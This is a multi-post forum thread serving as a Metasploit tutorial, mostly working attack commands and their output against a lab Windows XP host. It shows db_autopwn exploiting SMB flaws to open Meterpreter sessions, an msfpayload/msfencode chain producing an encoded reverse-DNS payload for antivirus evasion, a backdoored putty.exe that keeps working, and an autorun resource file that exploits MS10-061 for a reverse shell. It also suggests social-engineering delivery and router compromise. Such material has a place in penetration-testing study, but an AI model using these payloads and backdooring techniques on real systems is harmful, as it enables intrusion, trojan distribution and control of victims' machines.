Re: My Metasploit tutorial thread
Code:
msf > db_nmap -A 192.168.25.147
Starting Nmap 5.35DC1 ( http://nmap.org ) at 2010-11-18 08:56 CST
Nmap scan report for victim-30fe648f (192.168.25.147)
Host is up (0.00074s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
2869/tcp closed icslap
MAC Address: 08:00:27:C1:63:8C (Cadmus Computer Systems)
Device type: general purpose
Running: Microsoft Windows XP
OS details: Microsoft Windows XP SP3
Network Distance: 1 hop
Service Info: OS: Windows
Host script results:
|_nbstat: NetBIOS name: VICTIM-30FE648F, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:c1:63:8c (Cadmus Computer Systems)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| Name: MSHOME\VICTIM-30FE648F
|_ System time: 2010-11-18 08:56:26 UTC-8
TRACEROUTE
HOP RTT ADDRESS
1 0.74 ms victim-30fe648f (192.168.25.147)
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.71 seconds
Then, we check it, and maybe take a look at the open services.
Code:
msf > db_hosts -c address,mac,name,state,updated_at,svcs,vulns
Hosts
=====
address mac name state updated_at svcs vulns
------- --- ---- ----- ---------- ---- -----
192.168.25.147 08:00:27:C1:63:8C victim-30fe648f alive 2010-11-18 15:34:25 UTC 3 0
msf > db_services
Services
========
created_at info name port proto state updated_at Host Workspace
---------- ---- ---- ---- ----- ----- ---------- ---- ---------
2010-11-18 15:34:26 UTC netbios-ssn 139 tcp open 2010-11-18 15:34:26 UTC 192.168.25.147 default
2010-11-18 15:34:26 UTC Microsoft Windows XP microsoft-ds microsoft-ds 445 tcp open 2010-11-18 15:34:26 UTC 192.168.25.147 default
2010-11-18 15:34:26 UTC icslap 2869 tcp closed 2010-11-18 15:34:26 UTC 192.168.25.147 default
We'll go ahead and run our db_autopwn now.
Code:
msf > db_autopwn -h[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port (default)
-q Disable exploit module output
-R [rank] Only run modules with a minimal rank
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m [regex] Only run modules whose name matches the regex
-T [secs] Maximum runtime for any exploit in seconds
msf > db_autopwn -p -r -e
[*] (1/50 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 192.168.25.147:139...
[*] (2/50 [0 sessions]): Launching exploit/linux/samba/chain_reply against 192.168.25.147:139...
[*] (3/50 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.25.147:139...
[*] (4/50 [0 sessions]): Launching exploit/linux/samba/trans2open against 192.168.25.147:139...
[*] (5/50 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.25.147:139...
[*] (6/50 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.25.147:139...
[*] (7/50 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.25.147:139...
[*] (8/50 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.25.147:139...
[*] (9/50 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.25.147:139...
[*] (10/50 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.25.147:139...
[*] (11/50 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.25.147:139...
[*] (12/50 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 192.168.25.147:139...
[*] (13/50 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.25.147:139...
[*] (14/50 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 192.168.25.147:139...
[*] (15/50 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.25.147:139...
[*] (16/50 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.25.147:139...
[*] (17/50 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.25.147:139...
[*] (18/50 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.25.147:139...
[*] (19/50 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 192.168.25.147:139...
[*] (20/50 [0 sessions]): Launching exploit/windows/smb/ms07_029_msdns_zonename against 192.168.25.147:139...
[*] (21/50 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.25.147:139...
[*] (22/50 [0 sessions]): Launching exploit/windows/smb/ms10_061_spoolss against 192.168.25.147:139...
[*] (23/50 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.25.147:139...
[*] (24/50 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.25.147:139...
[*] (25/50 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.25.147:139...
[*] (26/50 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 192.168.25.147:445...
[*] (27/50 [0 sessions]): Launching exploit/linux/samba/chain_reply against 192.168.25.147:445...
[*] (28/50 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.25.147:445...
[*] (29/50 [0 sessions]): Launching exploit/linux/samba/trans2open against 192.168.25.147:445...
[*] (30/50 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.25.147:445...
[*] (31/50 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.25.147:445...
[*] (32/50 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.25.147:445...
[*] (33/50 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.25.147:445...
[*] (34/50 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.25.147:445...
[*] (35/50 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.25.147:445...
[*] (36/50 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.25.147:445...
[*] (37/50 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 192.168.25.147:445...
[*] (38/50 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.25.147:445...
[*] (39/50 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 192.168.25.147:445...
[*] (40/50 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.25.147:445...
[*] (41/50 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.25.147:445...
[*] (42/50 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.25.147:445...
[*] (43/50 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.25.147:445...
[*] (44/50 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 192.168.25.147:445...
[*] (45/50 [0 sessions]): Launching exploit/windows/smb/ms07_029_msdns_zonename against 192.168.25.147:445...
[*] (46/50 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.25.147:445...
[*] (47/50 [0 sessions]): Launching exploit/windows/smb/ms10_061_spoolss against 192.168.25.147:445...
[*] (48/50 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.25.147:445...
[*] (49/50 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.25.147:445...
[*] (50/50 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.25.147:445...
[*] (50/50 [0 sessions]): Waiting on 23 launched modules to finish execution...
[*] (50/50 [1 sessions]): Waiting on 13 launched modules to finish execution...
[*] Meterpreter session 1 opened (192.168.25.133:5503 -> 192.168.25.147:1034) at 2010-11-18 08:58:58 -0600
[*] (50/50 [1 sessions]): Waiting on 12 launched modules to finish execution...
[*] Meterpreter session 2 opened (192.168.25.133:23683 -> 192.168.25.147:1035) at 2010-11-18 08:59:02 -0600
[*] (50/50 [2 sessions]): Waiting on 11 launched modules to finish execution...
[*] (50/50 [2 sessions]): Waiting on 8 launched modules to finish execution...
[*] Meterpreter session 4 opened (192.168.25.133:14963 -> 192.168.25.147:1038) at 2010-11-18 09:00:05 -0600
[*] Meterpreter session 3 opened (192.168.25.133:8853 -> 192.168.25.147:1037) at 2010-11-18 09:00:05 -0600
[*] (50/50 [4 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [4 sessions]): Waiting on 5 launched modules to finish execution...
[*] (50/50 [4 sessions]): Waiting on 4 launched modules to finish execution...
[*] (50/50 [4 sessions]): Waiting on 3 launched modules to finish execution...
[*] (50/50 [4 sessions]): Waiting on 1 launched modules to finish execution...
[*] (50/50 [4 sessions]): Waiting on 0 launched modules to finish execution...
..continued..
Re: My Metasploit tutorial thread
ok, now we're run our db_autopwn and managed to snag some sessions. Lets look at what hosts were exploited, and which exploits worked. I'm going to show a few methods to achieve this.
Code:
msf > db_vulns
[*] Time: 2010-11-18 15:57:36 UTC Vuln: host=192.168.25.147 name=exploit/windows/smb/ms08_067_netapi refs=CVE-2008-4250,OSVDB-49243,MSB-MS08-067,NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos
[*] Time: 2010-11-18 15:58:05 UTC Vuln: host=192.168.25.147 name=exploit/windows/smb/ms10_061_spoolss refs=OSVDB-67988,CVE-2010-2729,MSB-MS10-061
msf > db_exploited
[*]Time: 2010-11-18 15:57:38 UTC Host Info: host=192.168.25.147 port=139 proto=tcp sname=netbios-ssn exploit=exploit/windows/smb/ms08_067_netapi
[*] Time: 2010-11-18 15:57:41 UTC Host Info: host=192.168.25.147 port=445 proto=tcp sname=microsoft-ds exploit=exploit/windows/smb/ms08_067_netapi
[*] Time: 2010-11-18 15:58:05 UTC Host Info: host=192.168.25.147 port=445 proto=tcp sname=microsoft-ds exploit=exploit/windows/smb/ms10_061_spoolss
[*] Time: 2010-11-18 15:58:06 UTC Host Info: host=192.168.25.147 port=139 proto=tcp sname=netbios-ssn exploit=exploit/windows/smb/ms10_061_spoolss
[*] Found 4 exploited hosts.
msf > sessions -v
Active sessions
===============
Id Type Information Connection Via
-- ---- ----------- ---------- ---
1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ VICTIM-30FE648F 192.168.25.133:11425 -> 192.168.25.147:1039 exploit/windows/smb/ms08_067_netapi
2 meterpreter x86/win32 192.168.25.133:32002 -> 192.168.25.147:1040 exploit/windows/smb/ms08_067_netapi
3 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ VICTIM-30FE648F 192.168.25.133:15606 -> 192.168.25.147:1042 exploit/windows/smb/ms10_061_spoolss
4 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ VICTIM-30FE648F 192.168.25.133:11361 -> 192.168.25.147:1043 exploit/windows/smb/ms10_061_spoolss
You should even be able to run scripts on multiple sessions with the following;
in this example we'll use checkvm. I wasnt able to get all sessions to run some scripts, so I will not be including the output in this case. Perhaps a better idea would be to use setg with an initialautorunscript setting.
Code:
msf > sessions -s checkvm all
I think that should cover most of the basics for db_autopwn. It's quite handy and entertaining to mess around with. I also recommend checking out Rel1k's fast-track tool.
I have recorded a short demo video of some commands and will be uploading shortly.
EDIT:
Here is my quick db_autopwn vid
I am still working on optimal settings to use for the recordings and also my video editing skills. These are in real time so there might be a couple of points where you'd want to skip ahead a bit.
Re: My Metasploit tutorial thread
One thing I believe needs to be mentioned that I neglected previously with db_autopwn; Without first performing a vulnerability scan such as with nessus, db_autopwn running against matched ports will run far too many exploits that are not compatible with the platform/target.
In the previous example we can see we are running linux exploits against a windows box.
Quote:
msf > db_autopwn -p -r -e
[*] (1/50 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 192.168.25.147:139...
[*] (2/50 [0 sessions]): Launching exploit/linux/samba/chain_reply against 192.168.25.147:139...
[*] (3/50 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.25.147:139...
[*] (4/50 [0 sessions]): Launching exploit/linux/samba/trans2open against 192.168.25.147:139...
[*] (5/50 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.25.147:139...
[*] (6/50 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.25.147:139...
[*] (7/50 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.25.147:139...
[*] (8/50 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.25.147:139...
[*] (9/50 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.25.147:139...
This can easily be remedied with the -m flag. -m uses regular expressions to narrow the list. Yes we could import a nessus scan which is great, but the -m option is a solution that will take very little time.
Code:
msf > db_autopwn -p -r -e -m windows
results in 18 less exploits to run that are not needed, making the process faster.
Much nicer...
Re: My Metasploit tutorial thread
Quote:
Originally Posted by
iproute
I'll give some info on my take on it in another post when I've got more time, but I'm definitey not an expert. Might be good to get in touch with vivek and find out if there are any further presentations planned. From elsewhere on the internet it looks like he is pretty good about responding.
On another note, one of the things I feel I've missed above links wise is
IHS*|*Home of Johnny Long and Hackers for Charity, Inc
Please at least take a look at some of the cool stuff Johnny Long is doing.
About the firewall bypass, check out FWB++ at Megapanzer FWB++. Currently the binary just connects to the megapanzer RATs webpage but since the source is provided we can change the link to our ip i guess.
Did anyone have any success by using meterpreter egress buster or reverse DNS?
Re: My Metasploit tutorial thread
Here is my take on firewall bypass. Again, I am no expert.
For local firewall bypass(windows firewall) I'd be assuming you're on the same subnet as the victim machine, but the local firewall is preventing bind_tcp payloads. Of course in this instance we would just use a reverse_tcp payload.
For NAT traversal/bypass we can assume you would not be on the same subnet as the victim machine. In which case you might hope for open ports of some kind. If the victim machine is totally inaccessible through the NAT, then I might be thinking about using a social engineering attack with a reverse_tcp_dns payload, and point it back to myself with my no-ip hostname or some such. Granted you would need some mechanism to deliver your crafted payload, such as email or SMS, and would also of course need to know WHERE to send it. Hopefully enough time has been spent on the information gathering/enumeration phase of the pentest.
Or you could consider attacking the network equipment first. Suppose you could comprise the router first. Well now you have the keys to the kingdom. maybe modify the DHCP server so that it is handing out your IP as a DNS server, and direct people wherever we like. Some routers can set specific records for specific websites such as 2wire equipment. Maybe the router is capable of a VPN setup that could place us on the same inside subnet as our victim machine(this is Pivoting) and then all we'd have to deal with is the local firewall of the victim machine.
Another thing to keep in mind with a corporate network scenario. There is often a proxy server limiting outbound traffic making the reverse_tcp and or reverse_tcp_dns payloads more difficult to utilize. The one at my work for instance limits everything except 80, 443, 22 and a few others. Things that we would definitely be using in our jobs. Because of these common proxy configurations I like to set my reverse_tcp or reverse_tcp_dns payloads to 443 or another port that is commonly open for users.
Now there is a very interesting payload in the framework now, that might be very useful for this situation. I have never used it myself, however here is the info from it.
Code:
msf > info windows/meterpreter/reverse_tcp_allports
Name: Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
Version: 10394, 8998, 8984
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 294
Rank: Normal
Provided by:
skape <mmiller@hick.org>
sf <stephen_fewer@harmonysecurity.com>
hdm <hdm@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 1 yes The starting port number to connect back on
Description:
Try to connect back to the attacker, on all possible ports (1-65535,
slowly), Inject the meterpreter server DLL via the Reflective Dll
Injection payload (staged)
Regard A/V Bypass, I strongly recommend that interested parties do some reading on this forum. There is a lot of information just in the HowTo section here. Of course we'll need to use encoding. Encoding can be set inside of the exploit module or if you are generating a payload with msfpayload, you can pipe it through msfencode, even multiple times like this;
Code:
root@bt4:~# msfpayload windows/meterpreter/reverse_tcp_dns LHOST=my.no-
ip-hostname.com LPORT=443 R | msfencode -e x86/fnstenv_mov -c 2 -t raw |
msfencode -e x86/countdown -c 3 -t raw | msfencode -e x86/call4_dword_xor -c 1 -t
raw | msfencode -t raw | msfencode -e x86/shikata_ga_nai -c 4 -t exe >
/root/payload.exe
Don't forget you can use/backdoor an existing exe(some will not work. Experimentation is key) as a template with -x. You can even keep the template working with -k so when they run the payload exe, their expected program starts up just fine. Remember to use the -o option with these for your output file rather than redirecting the output. You can also set things up with
Code:
root@bt4:~# msfpayload windows/meterpreter/reverse_tcp_dns LHOST=my.no-
ip-hostname.com LPORT=443 EXITFUNC=thread R | msfenco......etc...
which will keep your meterpreter/payload process alive even when they close the backdoored executable.
There is also more than one way to generate payloads. You can do so within the framework. here is how
Code:
msf > use windows/meterpreter/reverse_tcp_dns
msf payload(reverse_tcp_dns) > set lhost your-noip-hostname.com
lhost => your-noip-hostname.com
msf payload(reverse_tcp_dns) > set lport 443
lport => 443
msf payload(reverse_tcp_dns) > set exitfunc thread
exitfunc => thread
msf payload(reverse_tcp_dns) > generate -h
Usage: generate [options]
Generates a payload.
OPTIONS:
-E Force encoding.
-b <opt> The list of characters to avoid: '\x00\xff'
-e <opt> The name of the encoder module to use.
-f <opt> The output file name (otherwise stdout)
-h Help banner.
-i <opt> the number of encoding iterations.
-k Keep the template executable functional
-o <opt> A comma separated list of options in VAR=VAL format.
-p <opt> The Platform for output.
-s <opt> NOP sled length.
-t <opt> The output format: raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war
-x <opt> The executable template to use
msf payload(reverse_tcp_dns) > generate -e x86/shikata_ga_nai -i 3 -t exe -x /root/putty.exe -k -f /root/payload.exe
If you do not use the -t option it will generate shellcode by default. Bear in mind, staged payloads such as meterpreter will output shellcode for both stages.
Re: My Metasploit tutorial thread
Here I'm going to mention resource files briefly. Specifically I would like to address the default resource file. I will demonstrate regular resource file usage when I have more time, but here is a cool bit.
Using the default msf resource file you can set certain commands to run on console startup. Perhaps we would like to have our postgres database autoconnect when we start things up.
Code:
root@bt:~# nano .msf3/msfconsole.rc
Go ahead and enter the commands you would like to run on startup. You can even do things like calling other resource files.
Code:
db_connect postgres:password@127.0.0.1/metasploit
db_status
Then when starting the framework it should look something like this;
Code:
root@bt:~# msfconsole
_ _ _ _
| | | | (_) |
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
| |
|_|
=[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 633 exploits - 312 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
=[ svn r11229 updated today (2010.12.05)
resource (/root/.msf3/msfconsole.rc)> db_connect postgres:password@127.0.0.1/metasploit
resource (/root/.msf3/msfconsole.rc)> db_status
[*] postgresql connected to metasploit
msf >
Here I will show making msfconsole into an instant shell. We will call a resource file from the default msfconsole.rc file.
This is a resource file I made with the makerc command in the framework.
Code:
root@bt:~# cat spoolss.rc
use windows/smb/ms10_061_spoolss
set rhost 192.168.25.147
set payload windows/shell/reverse_tcp
set lhost 192.168.25.106
set lport 5566
exploit
And here is what I added to my msfconsole.rc file
Code:
root@bt:~# cat .msf3/msfconsole.rc
db_connect postgres:severus@127.0.0.1/metasploit
db_status
resource spoolss.rc
which results in
Code:
root@bt:~# msfconsole
o 8 o o
8 8 8
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
8' 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8
8 8 8 8. 8 8 8 'Yb. 8 8 8 8 8 8 8
8 8 8 `Yooo' 8 `YooP8 `YooP' 8YooP' 8 `YooP' 8 8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
=[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 633 exploits - 312 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
=[ svn r11229 updated today (2010.12.05)
resource (/root/.msf3/msfconsole.rc)> db_connect postgres:severus@127.0.0.1/meta
sploit
resource (/root/.msf3/msfconsole.rc)> db_status[*] postgresql connected to metasploit
resource (/root/.msf3/msfconsole.rc)> resource spoolss.rc
resource (spoolss.rc)> use windows/smb/ms10_061_spoolss
resource (spoolss.rc)> set rhost 192.168.25.147
rhost => 192.168.25.147
resource (spoolss.rc)> set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
resource (spoolss.rc)> set lhost 192.168.25.106
lhost => 192.168.25.106
resource (spoolss.rc)> set lport 5566
lport => 5566
resource (spoolss.rc)> exploit
[*] Started reverse handler on 192.168.25.106:5566
[*] Trying target Windows Universal...
[*] Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:192.168.25.147[
\spoolss] ...
[*] Bound to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:192.168.25.147[\s
poolss] ...
[*] Attempting to exploit MS10-061 via \\192.168.25.147\Lexmark1 ...
[*] Printer handle: 0000000092e4d269f911344c9b69d159ed732a4e
[*] Job started: 0x4
[*] Wrote 73802 bytes to %SystemRoot%\system32\7FnILYxzIVvGR1.exe
[*] Job started: 0x5
[*] Wrote bind request for \\192.168.25.147\PIPE\ATSVC (72 bytes)
[*] Wrote 96 bytes of NetrAddJob request
[*] Everything should be set, waiting up to two minutes for a session...
[*] Sending stage (240 bytes) to 192.168.25.147
[*] Command shell session 1 opened (192.168.25.106:5566 -> 192.168.25.147:1036)
at Sun Dec 05 20:09:00 -0600 2010
C:\WINDOWS\system32>
An alternative of course to including the spoolss.rc in the default resource file is to just start the console with the -r flag such as;
Code:
root@bt:~# msfconsole -r spoolss.rc
I am using a windows/shell payload for simplicity and speed in this case. Also this brief bit on resource files is simply designed to illustrate some of the methodology that can be used.
Re: My Metasploit tutorial thread
Make sure you pay attention to the Metasploit Framework Unleashed course that is available. It does see updates that coincide with the framework development and always has top quality. I was not previously aware of the Armitage GUI available for the framework until recently by checking out MSFU again. I was very impressed once I got it working correctly. Had some database issues that I believe should be isolated to myself.
The reference for this GUI tool is here in the MSFU course, Chaper 13 - Beyond Metasploit.
The Armitage homepage is here and has a very good manual, as well as a media section with some howto videos. It is very easy to setup and use. BT4R2 should already have your databases ready to go. I used postgres rather than mysql in this case
I used
Code:
root@bt:~# apt-get update
root@bt:~# apt-get install armitage
root@bt:~# /etc/init.d/postgresql-8.3 start
root@bt:~# msfrpcd -U msf -P test -t Basic &
root@bt:~# cd /pentest/exploits/armitage/
root@bt:/pentest/exploits/armitage# ./armitage.sh
Then I set the DB Driver to postgres in the drop down menu, checked SSL(if it wasn't already) and used the DB connect string;
Code:
postgres:password@127.0.0.1/armitage
So far, from what I've used of it, this GUI is quite fast and effective at simplifying many metasploit tasks. Pass the hash and pivoting look to have been made very very simple. I definitely recommend at least checking it out. Even though I generally perfer CLI, I do like this GUI.
